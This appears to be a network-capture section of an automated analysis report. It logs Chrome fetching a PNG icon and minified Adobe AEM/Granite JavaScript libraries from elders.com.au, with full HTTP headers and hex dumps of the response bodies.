                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
                                                                                                                                    2024-11-05 08:03:26 UTC696INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 555
                                                                                                                                    Connection: close
                                                                                                                                    last-modified: Tue, 11 Jun 2024 06:29:43 GMT
                                                                                                                                    etag: "0x8DC89DFE156C48F"
                                                                                                                                    content-disposition: attachment; filename="find-expert.png"; filename*=UTF-8''find-expert.png
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-vhost: publish
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-pao-kpao1770025-PAO
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1718122491.698631,VS0,VS0,VE1131
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 1
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ca4e3b144a-DFW
                                                                                                                                    2024-11-05 08:03:26 UTC555INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 16 08 06 00 00 00 c4 b4 6c 3b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 01 c0 49 44 41 54 78 01 ed 54 31 56 c2 40 10 9d 59 f2 b4 d3 d8 59 88 2f 3e b0 15 72 02 f5 06 7a 03 3c 81 7a 02 f5 06 7a 02 f0 04 7a 03 f0 04 f8 c0 12 9e fb 84 c2 ce 60 a5 90 dd 71 16 04 36 04 48 2c e8 fc d5 66 e7 ef 9f 99 9d bf 41 48 81 e6 4e fe 48 0b 38 82 94 d0 fd b0 e2 a4 21 92 a0 32 02 7a 90 12 62 cd 01 01 2b c2 bf f0 ea 85 53 b9 22 06 82 1a 20 ca 45 61 b6 e6 e3 9f 85 09 e0 a6 d0 69 5d 27 f1 22 c2 f5 6d cf 63 0f 96 86 59 d9 e4 fe bb 94 56 38 50 1a 4e fd 6e ab 36 de 68 64 73 27 84 58 44 22 a9 06 aa 66
                                                                                                                                    Data Ascii: PNGIHDRl;pHYssRGBgAMAaIDATxT1V@YY/>rz<zzz`q6H,fAHNH8!2zb+S" Eai]'"mcYV8PNn6hds'XD"f


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    138192.168.2.449927162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC873OUTGET /etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
                                                                                                                                    2024-11-05 08:03:26 UTC611INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    cache-control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Tue, 27 Feb 2024 20:17:52 GMT
                                                                                                                                    etag: W/"2151-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-sjc1000105-SJC
                                                                                                                                    X-Cache: HIT
                                                                                                                                    X-Timer: S1710180973.161103,VS0,VS0,VE1
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 451884
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ca6b6f6b59-DFW
                                                                                                                                    2024-11-05 08:03:26 UTC758INData Raw: 32 31 35 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 63 28 29 3a 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 3d 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 29 2e 53 6c 69 6e 67 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 53 45 4c 45 43 54 4f 52 5f 49 4e 46 49 4e 49 54 59 3a 22 2e 69 6e 66 69 6e 69 74 79 22 2c 43 48 41 52 53 45 54 3a 22 5f 63 68 61 72 73 65 74 5f 22 2c 53 54 41 54 55 53 3a 22 3a 73 74 61 74 75 73 22 2c 53 54 41 54 55 53 5f 42 52 4f 57 53 45 52 3a 22 62 72 6f 77 73 65 72 22 2c 4f 50 45 52 41 54 49 4f 4e 3a 22 3a 6f 70 65 72 61 74
                                                                                                                                    Data Ascii: 2151(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Sling=c()})(function(){return{SELECTOR_INFINITY:".infinity",CHARSET:"_charset_",STATUS:":status",STATUS_BROWSER:"browser",OPERATION:":operat
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 74 69 6c 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 70 61 74 63 68 54 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 68 29 7b 69 66 28 68 29 69 66 28 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 68 29 29 63 3d 63 2e 72 65 70 6c 61 63 65 28 22 7b 30 7d 22 2c 68 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 68 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 63 3d 63 2e 72 65 70 6c 61 63 65 28 22 7b 22 2b 65 2b 22 7d 22 2c 68 5b 65 5d 29 3b 72 65 74 75 72 6e 20 63 7d 2c 67 65 74 54 6f 70 57 69 6e 64 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 77 69 6e 64 6f 77 3b 69 66 28 74 68 69 73 2e 69 46 72 61 6d 65
                                                                                                                                    Data Ascii: til=c()})(function(){return{patchText:function(c,h){if(h)if("[object Array]"!==Object.prototype.toString.call(h))c=c.replace("{0}",h);else for(var e=0;e<h.length;e++)c=c.replace("{"+e+"}",h[e]);return c},getTopWindow:function(){var c=window;if(this.iFrame
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 6e 75 6c 6c 3d 3d 3d 65 26 26 28 65 3d 64 2e 64 65 74 65 63 74 43 6f 6e 74 65 78 74 50 61 74 68 28 29 29 3b 72 65 74 75 72 6e 20 65 7d 2c 64 65 74 65 63 74 43 6f 6e 74 65 78 74 50 61 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 43 51 55 52 4c 49 6e 66 6f 29 65 3d 43 51 55 52 4c 49 6e 66 6f 2e 63 6f 6e 74 65 78 74 50 61 74 68 7c 7c 22 22 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 2c 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 66 3d 6d 2e 65 78 65 63 28 61 5b 62 5d 2e 73 72 63 29 3b 69 66 28 66 29 72 65 74 75 72 6e 20 65 3d 66 5b 31 5d 7d 65 3d
                                                                                                                                    Data Ascii: nction(){null===e&&(e=d.detectContextPath());return e},detectContextPath:function(){try{if(window.CQURLInfo)e=CQURLInfo.contextPath||"";else{for(var a=document.getElementsByTagName("script"),b=0;b<a.length;b++){var f=m.exec(a[b].src);if(f)return e=f[1]}e=
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 61 63 65 28 2f 25 35 44 2f 67 2c 22 5d 22 29 3b 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2f 67 2c 22 25 33 46 22 29 3b 72 65 74 75 72 6e 20 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 23 2f 67 2c 22 25 32 33 22 29 7d 2c 68 61 6e 64 6c 65 4c 6f 67 69 6e 52 65 64 69 72 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 29 7b 6e 3d 0a 21 30 3b 61 6c 65 72 74 28 47 72 61 6e 69 74 65 2e 49 31 38 6e 2e 67 65 74 28 22 59 6f 75 72 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 63 6f 6d 70 6c 65 74 65 64 20 62 65 63 61 75 73 65 20 79 6f 75 20 68 61 76 65 20 62 65 65 6e 20 73 69 67 6e 65 64 20 6f 75 74 2e 22 29 29 3b 76 61 72 20 61 3d 63 2e 67 65 74 54 6f 70 57 69 6e 64 6f 77 28 29 2e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3b
                                                                                                                                    Data Ascii: ace(/%5D/g,"]");a=a.replace(/\?/g,"%3F");return a=a.replace(/#/g,"%23")},handleLoginRedirect:function(){if(!n){n=!0;alert(Granite.I18n.get("Your request could not be completed because you have been signed out."));var a=c.getTopWindow().document.location;
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 62 3d 62 7c 7c 64 2e 67 65 74 4c 6f 63 61 6c 65 28 29 3b 69 66 28 21 68 5b 62 5d 29 7b 70 3d 30 3d 3d 3d 62 2e 69 6e 64 65 78 4f 66 28 64 2e 50 53 45 55 44 4f 5f 4c 41 4e 47 55 41 47 45 29 3b 74 72 79 7b 76 61 72 20 66 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 6c 3d 66 2e 6f 70 65 6e 2c 6b 3d 63 2e 65 78 74 65 72 6e 61 6c 69 7a 65 3b 76 61 72 20 71 3d 62 3b 69 66 28 61 29 76 61 72 20 72 3d 65 2b 71 2b 6d 3b 65 6c 73 65 7b 76 61 72 20 74 2c 75 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 68 74 6d 6c 22 29 3b 75 26 26 28 74 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 31 38 6e 2d 64 69 63 74 69 6f 6e 61 72 79 2d 73 72 63 22 29 29 3b 72 3d 74 3f 74 2e 72 65 70 6c 61 63 65 28 22 7b 6c 6f
                                                                                                                                    Data Ascii: b=b||d.getLocale();if(!h[b]){p=0===b.indexOf(d.PSEUDO_LANGUAGE);try{var f=new XMLHttpRequest,l=f.open,k=c.externalize;var q=b;if(a)var r=e+q+m;else{var t,u=document.querySelector("html");u&&(t=u.getAttribute("data-i18n-dictionary-src"));r=t?t.replace("{lo
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 28 29 7d 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 63 28 29 3a 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 3d 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 29 2e 54 6f 75 63 68 49 6e 64 69 63 61 74 6f 72 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 7b 7d 2c 68 3d 5b 5d 3b 72 65 74 75 72 6e 7b 64 65 62 75 67 57 69 74 68 4d 6f 75 73 65 3a 21 31 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 65 2e 75 70 64 61 74 65 28 67 2e 74 6f 75 63 68 65 73 29 3b 72 65 74 75 72 6e 21 30
                                                                                                                                    Data Ascii: ()});(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).TouchIndicator=c()})(function(){var c={},h=[];return{debugWithMouse:!1,init:function(){var e=this,m=function(g){e.update(g.touches);return!0
                                                                                                                                    2024-11-05 08:03:26 UTC934INData Raw: 29 7d 3b 68 2e 67 65 74 43 6f 6f 6b 69 65 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 68 2e 67 65 74 57 68 69 74 65 6c 69 73 74 43 6f 6f 6b 69 65 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 3b 68 2e 69 73 4f 70 74 65 64 4f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 67 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 70 3d 30 3b 70 3c 67 2e 6c 65 6e 67 74 68 3b 70 2b 2b 29 7b 76 61 72 20 6e 3d 67 5b 70 5d 2e 73 70 6c 69 74 28 22 5c 78 33 64 22 29 5b 30 5d 3b 6e 3d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 3f 6e 2e 74 72 69 6d 28 29 3a 6e 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30
                                                                                                                                    Data Ascii: )};h.getCookieNames=function(){return e};h.getWhitelistCookieNames=function(){return m};h.isOptedOut=function(){for(var g=document.cookie.split(";"),p=0;p<g.length;p++){var n=g[p].split("\x3d")[0];n=String.prototype.trim?n.trim():n.replace(/^[\s\uFEFF\xA0
                                                                                                                                    2024-11-05 08:03:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    139192.168.2.449919162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC1076OUTGET /etc.clientlibs/core/wcm/components/commons/site/clientlibs/container.lc-0a6aff292f5cc42142779cde92054524-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
                                                                                                                                    2024-11-05 08:03:26 UTC608INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Tue, 02 Jul 2024 00:47:20 GMT
                                                                                                                                    etag: W/"4f7-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-sjc10031-SJC
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1720071107.278860,VS0,VS0,VE2
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 409662
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ca7a996bcc-DFW
                                                                                                                                    2024-11-05 08:03:26 UTC761INData Raw: 34 66 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 43 51 3d 77 69 6e 64 6f 77 2e 43 51 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 3d 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 75 74 69 6c 73 3d 7b 7d 3b 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 75 74 69 6c 73 3d 7b
                                                                                                                                    Data Ascii: 4f7(function(){window.CQ=window.CQ||{};window.CQ.CoreComponents=window.CQ.CoreComponents||{};window.CQ.CoreComponents.container=window.CQ.CoreComponents.container||{};window.CQ.CoreComponents.container.utils={};window.CQ.CoreComponents.container.utils={
                                                                                                                                    2024-11-05 08:03:26 UTC517INData Raw: 7b 76 61 72 20 67 3d 61 2e 5f 65 6c 65 6d 65 6e 74 73 5b 62 5d 5b 65 5d 2c 66 3d 21 31 3b 61 2e 5f 65 6c 65 6d 65 6e 74 73 5b 63 5d 26 26 28 66 3d 28 66 3d 61 2e 5f 65 6c 65 6d 65 6e 74 73 5b 63 5d 5b 65 5d 29 26 26 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 69 64 5c 78 33 64 27 22 2b 64 2b 22 27 5d 22 29 29 3b 69 66 28 67 2e 69 64 3d 3d 3d 64 7c 7c 66 29 72 65 74 75 72 6e 20 65 7d 7d 72 65 74 75 72 6e 2d 31 7d 2c 67 65 74 44 65 65 70 4c 69 6e 6b 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 63 3d 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 75 74 69 6c 73 2e 67 65 74 44 65 65 70 4c 69 6e 6b 49 74 65 6d 49 64 78 28 61 2c 62 2c 63 29 3b 69 66 28 61 26 26 61 2e 5f 65 6c
                                                                                                                                    Data Ascii: {var g=a._elements[b][e],f=!1;a._elements[c]&&(f=(f=a._elements[c][e])&&f.querySelector("[id\x3d'"+d+"']"));if(g.id===d||f)return e}}return-1},getDeepLinkItem:function(a,b,c){c=window.CQ.CoreComponents.container.utils.getDeepLinkItemIdx(a,b,c);if(a&&a._el
                                                                                                                                    2024-11-05 08:03:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    140192.168.2.449926162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC882OUTGET /etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
                                                                                                                                    2024-11-05 08:03:26 UTC610INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Tue, 05 Nov 2024 06:39:17 GMT
                                                                                                                                    etag: W/"e61-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210133-DFW
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1730793807.530963,VS0,VS0,VE1
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53cabd6f1448-DFW
                                                                                                                                    2024-11-05 08:03:26 UTC759INData Raw: 65 36 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 67 2c 65 29 7b 65 2e 47 72 61 6e 69 74 65 3d 65 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 3b 65 2e 47 72 61 6e 69 74 65 2e 24 3d 65 2e 47 72 61 6e 69 74 65 2e 24 7c 7c 67 3b 65 2e 5f 67 3d 65 2e 5f 67 7c 7c 7b 7d 3b 65 2e 5f 67 2e 24 3d 65 2e 5f 67 2e 24 7c 7c 67 3b 76 61 72 20 6b 3d 47 72 61 6e 69 74 65 2e 48 54 54 50 3b 67 2e 61 6a 61 78 53 65 74 75 70 28 7b 65 78 74 65 72 6e 61 6c 69 7a 65 3a 21 30 2c 65 6e 63 6f 64 65 50 61 74 68 3a 21 30 2c 68 6f 6f 6b 3a 21 30 2c 62 65 66 6f 72 65 53 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 63 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 47 5f 49 53 5f 48 4f 4f 4b 45 44 26 26 47 5f 49 53 5f 48 4f 4f 4b 45 44 28 63 2e 75 72 6c 29 7c 7c 28 63 2e 65 78
                                                                                                                                    Data Ascii: e61(function(g,e){e.Granite=e.Granite||{};e.Granite.$=e.Granite.$||g;e._g=e._g||{};e._g.$=e._g.$||g;var k=Granite.HTTP;g.ajaxSetup({externalize:!0,encodePath:!0,hook:!0,beforeSend:function(h,c){"undefined"!==typeof G_IS_HOOKED&&G_IS_HOOKED(c.url)||(c.ex
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 76 61 72 20 62 3d 22 2f 2f 22 2b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 62 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 64 7c 7c 61 2e 73 6c 69 63 65 28 30 2c 64 2e 6c 65 6e 67 74 68 2b 31 29 3d 3d 3d 64 2b 22 2f 22 7c 7c 61 3d 3d 3d 62 7c 7c 61 2e 73 6c 69 63 65 28 30 2c 62 2e 6c 65 6e 67 74 68 2b 31 29 3d 3d 3d 62 2b 22 2f 22 7c 7c 21 2f 5e 28 5c 2f 5c 2f 7c 68 74 74 70 3a 7c 68 74 74 70 73 3a 29 2e 2a 2f 2e 74 65 73 74 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e
                                                                                                                                    Data Ascii: tion e(){this._handler=[]}function k(a){var b="//"+document.location.host,d=document.location.protocol+b;return a===d||a.slice(0,d.length+1)===d+"/"||a===b||a.slice(0,b.length+1)===b+"/"||!/^(\/\/|http:|https:).*/.test(a)}function h(a){window.console&&con
